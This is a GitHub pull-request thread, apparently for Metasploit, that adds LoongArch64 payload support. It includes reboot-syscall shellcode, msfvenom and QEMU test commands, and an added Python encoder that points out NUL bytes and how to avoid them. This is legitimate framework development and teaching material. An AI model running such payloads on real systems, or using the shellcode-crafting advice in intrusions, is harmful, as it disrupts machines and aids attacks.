@bcoles bcoles commented Nov 8, 2025

Add support for LoongArch64 payloads. Includes Linux Reboot payload for testing.

Tested on:

  • QEMU 10.0.50
  • Alpine Standard 3.21.0
  • Loong Arch Linux 2023.12.13

Note:

  • We don't handle syscall failure or call exit. This saves a few bytes.
  • Executing the Linux Reboot payloads as a low privileged user will crash. reboot is a privileged syscall.
  • For elf-so, I gave up trying to make a working shared object that plays nicely with the LoongArch dynamic loader. Getting this to work may require modifying our ELF patching code in Msf::Util::EXE.to_exe_elf to patch DT_INIT - which is significant scope creep for this PR. Instead I took the lazy option: the LoongArch SO template is almost identical to our aarch64 and riscv64le templates, and the generated elf-so file will work when executed directly (./payload.so) but will fail when loaded with LD_PRELOAD.

Motivation

This PR lays the foundation for further development of LoongArch payloads.

AI summary:

LoongArch is a new 64-bit Reduced Instruction Set Computer (RISC) instruction set architecture (ISA) introduced by Loongson Technology in 2020, developed based on the company's two decades of experience in CPU development and ecosystem construction. It is designed to be independent of foreign architectures like x86, ARM, and RISC-V, aiming to establish a self-sufficient industrial ecosystem in China, particularly in response to trade sanctions and dependency on foreign intellectual property. LoongArch is not binary compatible with MIPS or RISC-V, although it shows architectural influence from both. The ISA consists of a compulsory infrastructure and optional extensions, including vector instructions, virtualization, and binary translation, incorporating nearly 2,000 instructions.

The Linux kernel has supported LoongArch since 2022. gcc and musl already support compiling for LoongArch.

The list of popular Linux distros supporting LoongArch is growing, with Debian, Gentoo, Slackware, and Fedora offering experimental builds, and Alpine offering official support. See also: Are We Loong Yet?

LoongArch based development boards / SBCs and consumer-grade laptops are slowly entering the market.

The changes introduced in this PR wire up msfvenom and Metasploit interfaces to support LoongArch, with a simple test payload and spec test, which should greatly assist with subsequent development.

Verification

Linux Reboot Payload

Generate a Linux Reboot payload (with optional 100 byte NOP sled):

  • ./msfvenom -n 100 --format elf -p linux/loongarch64/reboot > reboot.elf

Execute the payload with QEMU (I suggest doing this within an emulated Linux environment):

  • /home/user/qemu/build/qemu-loongarch64 -strace ./reboot
  • Note reboot fails as a low privileged user
  • Save your work. You are about to reboot your system.
  • sudo /home/user/qemu/build/qemu-loongarch64 -strace ./reboot
  • Note the system reboots

Source:

$ cat reboot.s
# LoongArch64 reboot shellcode
# ---
# bcoles

.global _start
.section .text

_start:
  li.d $a0, 0xfee1dead   # magic1 (LINUX_REBOOT_MAGIC1)
  li.d $a1, 0x28121969   # magic2 (LINUX_REBOOT_MAGIC2)
  li.d $a2, 0x01234567   # LINUX_REBOOT_CMD_RESTART ($a3 / arg is not read for RESTART)
  li.w $a7, 142          # __NR_reboot
  syscall 0x0101         # the immediate is ignored by the Linux syscall handler
$ cat build
#!/bin/sh
PATH="/home/user/Desktop/musl-cross/loongarch64-unknown-linux-musl/bin/:$PATH"
loongarch64-unknown-linux-musl-as reboot.s -o reboot.o && \
loongarch64-unknown-linux-musl-ld -O2 reboot.o -o reboot --nostdlib --static && \
loongarch64-unknown-linux-musl-objdump -d reboot
$ /home/user/Desktop/musl-cross/loongarch64-unknown-linux-musl/bin/loongarch64-unknown-linux-musl-objdump -d reboot

reboot:     file format elf64-loongarch


Disassembly of section .text:

0000000120000078 <_start>:
   120000078:	15fdc3a4 	lu12i.w     	$a0, -4579
   12000007c:	03bab484 	ori         	$a0, $a0, 0xead
   120000080:	16000004 	lu32i.d     	$a0, 0
   120000084:	14502425 	lu12i.w     	$a1, 164129
   120000088:	03a5a4a5 	ori         	$a1, $a1, 0x969
   12000008c:	14024686 	lu12i.w     	$a2, 4660
   120000090:	03959cc6 	ori         	$a2, $a2, 0x567
   120000094:	0382380b 	li.w        	$a7, 0x8e
   120000098:	002b0101 	syscall     	0x101

Hardware

I don't have real hardware, but QEMU should be sufficient. I'm not sure of your chances of buying LoongArch hardware outside of China, but you could try:

Emulation

Note that apparently QEMU 7.2.0+ is required:

Note: Target support for LoongArch is fully upstreamed as of 2022-07-23, but QEMU 7.1.0 still contained bugs that effectively prevented linux-user emulation of LoongArch from working, and system emulation mildly suffered as well. QEMU 7.2.0 should be usable out of the box. ~ https://blog.xen0n.name/en/posts/tinkering/loongarch-faq/

A few distros offer LoongArch builds, but I've had mixed results building them. Below are my recipes for working systems. YMMV; I built these a few years ago.

Loong Arch Linux

$ ls archlinux-minimal-2023.12.13-loong64/
archlinux-minimal-2023.12.13-loong64.qcow2  archlinux-minimal-2023.12.13-loong64.qcow2.zst  QEMU_EFI_7.2.fd  QEMU_EFI_8.0.fd  run
$ cat archlinux-minimal-2023.12.13-loong64/run
#!/bin/sh
# https://loongarchlinux.org/pages/vmrun/
# https://mirrors.pku.edu.cn/loongarch/archlinux/images/
# Administrator username: root
# Administrator password: loongarch
# User username: loongarch
# User password: loongarch

/home/user/qemu/build/qemu-system-loongarch64 \
    -serial mon:stdio \
    -m 2G \
    -cpu la464-loongarch-cpu \
    -machine virt \
    -smp 2 \
    -bios QEMU_EFI_8.0.fd \
    -device virtio-gpu-pci \
    -net nic \
    -net user \
    -device nec-usb-xhci,id=xhci,addr=0x1b \
    -device usb-tablet,id=tablet,bus=xhci.0,port=1 \
    -device usb-kbd,id=keyboard,bus=xhci.0,port=2 \
    -hda archlinux-minimal-2023.12.13-loong64.qcow2 \
    -no-reboot

#-net user,hostfwd=tcp::5022-:22 \
#-net tap,ifname=vnet0,script=no,downscript=no \

Alpine Linux

$ ls alpine-standard-3.21.0-loongarch64
alpine.img  QEMU_EFI_8.0.fd  run
$ cat alpine-standard-3.21.0-loongarch64/run 
#!/bin/sh
# qemu-img create -f qcow2 alpine.img +20G
# https://wiki.alpinelinux.org/wiki/Loongarch64

/home/user/qemu/build/qemu-system-loongarch64 \
    -nographic \
    -m 2G \
    -cpu la464-loongarch-cpu \
    -machine virt \
    -smp 2 \
    -bios QEMU_EFI_8.0.fd \
    -device virtio-gpu-pci \
    -hda alpine.img \
    -net nic \
    -net user \
    -no-reboot


    #-boot d -cdrom alpine-standard-3.21.0-loongarch64.iso \

    #-net user,hostfwd=tcp::5022-:22 \
    #-net tap,ifname=vnet0,script=no,downscript=no \

Use the commented -drive line at the bottom to boot from ISO to complete the install process. Then comment the line again to boot the installed system.

You may (or may not) need the u-boot-qemu and opensbi packages (apt install u-boot-qemu opensbi).

References
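The objdump output in the Verification section shows the assembler turning each `li.d` into `lu12i.w` / `ori` (and, for 0xfee1dead, an extra `lu32i.d`). The following is an added example, not code from the PR or from Metasploit: a minimal LoongArch64 encoder for the handful of instructions reboot.s uses. It reproduces that expansion word for word and then scans the resulting shellcode for NUL bytes, which is the first constraint anyone reusing this payload outside a standalone ELF will hit. Opcodes and register numbers follow the LoongArch ISA manual; that the assembler omits an `ori` when the low 12 bits are zero is an assumption of this example, and the `addi` form used for small negative immediates is deliberately not modelled.

```python
# Added example (not the PR's code): encode the instructions reboot.s uses,
# reproduce the assembler's li.d / li.w expansion, and flag NUL bytes.
import struct

MASK64 = (1 << 64) - 1

# ABI register names used in reboot.s -> GPR numbers
REGS = {"$zero": 0, "$a0": 4, "$a1": 5, "$a2": 6, "$a7": 11}


def sext(value, bits):
    """Interpret the low `bits` bits of value as a two's-complement integer."""
    value &= (1 << bits) - 1
    return value - (1 << bits) if value & (1 << (bits - 1)) else value


def lu12i_w(rd, si20):
    """lu12i.w rd, si20: rd = sext32(si20 << 12). Opcode 0001010, si20 in bits 24:5."""
    return 0x14000000 | ((si20 & 0xFFFFF) << 5) | (rd & 0x1F)


def lu32i_d(rd, si20):
    """lu32i.d rd, si20: rd[51:32] = si20, rd[63:52] = sign of si20, low 32 bits kept."""
    return 0x16000000 | ((si20 & 0xFFFFF) << 5) | (rd & 0x1F)


def lu52i_d(rd, rj, si12):
    """lu52i.d rd, rj, si12: rd = (si12 << 52) | rj[51:0]."""
    return 0x03000000 | ((si12 & 0xFFF) << 10) | ((rj & 0x1F) << 5) | (rd & 0x1F)


def ori(rd, rj, ui12):
    """ori rd, rj, ui12: rd = rj | zero-extended 12-bit immediate."""
    return 0x03800000 | ((ui12 & 0xFFF) << 10) | ((rj & 0x1F) << 5) | (rd & 0x1F)


def syscall(code):
    """syscall code: the 15-bit code field is a marker only; Linux does not read it."""
    return 0x002B0000 | (code & 0x7FFF)


def li_d(rd, imm):
    """Expand `li.d rd, imm` (64-bit immediate) into real instructions.

    lu12i.w sign-extends bit 31, so after lu12i.w + ori the register holds
    sext32(imm & 0xffffffff). lu32i.d is only needed when that differs from imm
    (it does for 0xfee1dead, not for 0x28121969), and lu52i.d only when bits
    63:52 still differ after lu32i.d's own sign extension of bit 51.
    """
    v = imm & MASK64
    signed = sext(v, 64)
    if 0 <= signed <= 0xFFF:                   # fits ui12: single ori from $zero
        return [ori(rd, REGS["$zero"], signed)]
    if -0x800 <= signed < 0:                   # assembler uses addi here; not modelled
        raise ValueError("small negative immediates (addi form) are out of scope")
    words = [lu12i_w(rd, sext(v >> 12, 20))]
    if v & 0xFFF:                              # assumption: a zero low part is skipped
        words.append(ori(rd, rd, v & 0xFFF))
    held = sext(v, 32)                         # value now sitting in rd
    if held != signed:
        words.append(lu32i_d(rd, sext(v >> 32, 20)))
        held = sext(v, 52)
    if held != signed:
        words.append(lu52i_d(rd, rd, sext(v >> 52, 12)))
    return words


def li_w(rd, imm):
    """`li.w rd, imm`: 32-bit immediate, sign-extended, so lu32i.d never appears."""
    return li_d(rd, sext(imm, 32))


def reboot_words():
    """The instruction words of reboot.s, in program order."""
    words = []
    words += li_d(REGS["$a0"], 0xFEE1DEAD)     # LINUX_REBOOT_MAGIC1
    words += li_d(REGS["$a1"], 0x28121969)     # LINUX_REBOOT_MAGIC2
    words += li_d(REGS["$a2"], 0x01234567)     # LINUX_REBOOT_CMD_RESTART
    words += li_w(REGS["$a7"], 142)            # __NR_reboot (asm-generic table)
    words.append(syscall(0x101))
    return words


def reboot_shellcode():
    """The raw payload bytes: little-endian 32-bit words."""
    return b"".join(struct.pack("<I", w) for w in reboot_words())


def find_bad_bytes(code, bad=(0x00,)):
    """Offsets of bytes in `bad` (NUL by default), the classic shellcode constraint."""
    return [i for i, b in enumerate(code) if b in bad]


if __name__ == "__main__":
    for w in reboot_words():
        print(f"{w:08x}")
    sc = reboot_shellcode()
    print(f"{len(sc)} bytes, NUL at offsets {find_bad_bytes(sc)}")
```

Two things fall out of running it. The NULs sit at offsets 9 and 10 (inside `lu32i.d $a0, 0`) and at offset 35: the top byte of every `syscall` encoding is 0x00 whatever code is given, so a NUL-free LoongArch payload needs an encoder or a self-modifying stub rather than a different immediate. The `lu32i.d` itself is only there because `li.d` promises the full 64-bit value 0x00000000fee1dead; `sys_reboot` takes magic1 as an `int`, so loading the sign-extended 32-bit pattern would satisfy the kernel and drop four bytes and two NULs.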

@bcoles bcoles added the payload label Nov 8, 2025
@dledda-r7 dledda-r7 self-assigned this Nov 11, 2025
@dledda-r7 dledda-r7 commented

@bcoles Thanks for your contribution. Do you think it is worth considering adding it to mettle? We have a couple of architectures I want us to get rid of because they are unused (ARMBE for example) and PPC because it is broken, so this should give us space to throw in a new arch. I was already thinking about RISC-V and maybe this one. I've seen that this BPI-2K0300 Zhongke Loongson 2K0300 Embedded Single-board CPU 1.0GHz DDR4 Computer is ~40 euro and may be a good addition to our lab; I should be able to swap it in somewhere. Also including @bwatters-r7 for visibility since he is our IoT lab guru.

bcoles commented Nov 11, 2025

> Do you think it is worth considering adding it to mettle? We have a couple of architectures I want us to get rid of because they are unused (ARMBE for example) and PPC because it is broken, so this should give us space to throw in a new arch. I was already thinking about RISC-V and maybe this one.

Support for RISC-V is worth adding to mettle.

Whether support for LoongArch would be useful remains to be seen. Loongson have had several attempts at using and extending MIPS prior to the development of their own ISA. LoongArch is gaining popularity and has political backing. It seems likely to me that LoongArch will be more popular than its MIPS-based predecessors and ultimately replace them in China, but whether LoongArch will ever see widespread adoption outside of China is unclear. There's also the tiny issue of export restrictions which may never be lifted.

> I've seen that this BPI-2K0300 Zhongke Loongson 2K0300 Embedded Single-board CPU 1.0GHz DDR4 Computer is ~40 euro and may be a good addition to our lab; I should be able to swap it in somewhere.

This looks like a LoongISA chip which is MIPS based. For LoongArch you'll want a Loongson 3A5000+.

@dledda-r7 dledda-r7 commented

Ok thanks a lot @bcoles for sharing your thoughts, I'll go ahead and test this PR. Cheers!
